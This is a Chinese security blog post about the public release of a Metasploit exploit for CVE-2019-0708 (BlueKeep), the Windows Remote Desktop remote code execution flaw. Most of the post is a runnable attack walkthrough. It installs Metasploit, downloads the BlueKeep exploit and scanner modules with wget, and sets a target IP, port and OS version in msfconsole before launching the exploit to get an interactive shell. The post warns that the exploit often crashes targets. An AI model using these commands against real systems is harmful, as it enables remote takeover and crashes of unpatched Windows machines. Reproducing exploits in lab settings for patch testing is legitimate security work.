News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

CVE-2019-0708远程桌面代码执行漏洞EXP被公开

jasonx 373 0 条

前言

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp、win7等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口RDP协议进行攻击。

9月7日 号称比肩MS17-010漏洞(CVE-2019-0708)的利用EXP被公开。
Metasploit在推特上发布了漏洞利用视频和exp。

1.png

目前各位大佬和安全研究人士已在复现中,不过需要注意的是,目前公开的EXP很不稳定,容易造成目标蓝屏。

攻击环境准备

1、安装metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2、下载Reference中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
    
rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    
rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击命令

启动msf

msfconsole

重新加载攻击模块

reload_all

加载cve_2019_0708攻击模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

设置目标IP

set rhosts 192.168.1.10

设置目标远程桌面端口

set rport 3389

设置目标系统版本(0-4可选,可用info参数查看详情。)

set target 3

开始攻击

exploit

成功以后会返回一个session
输入shell即可获得一个交互式shell
2.png

参考资料:

https://github.com/rapid7/metasploit-framework/pull/12283/files

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址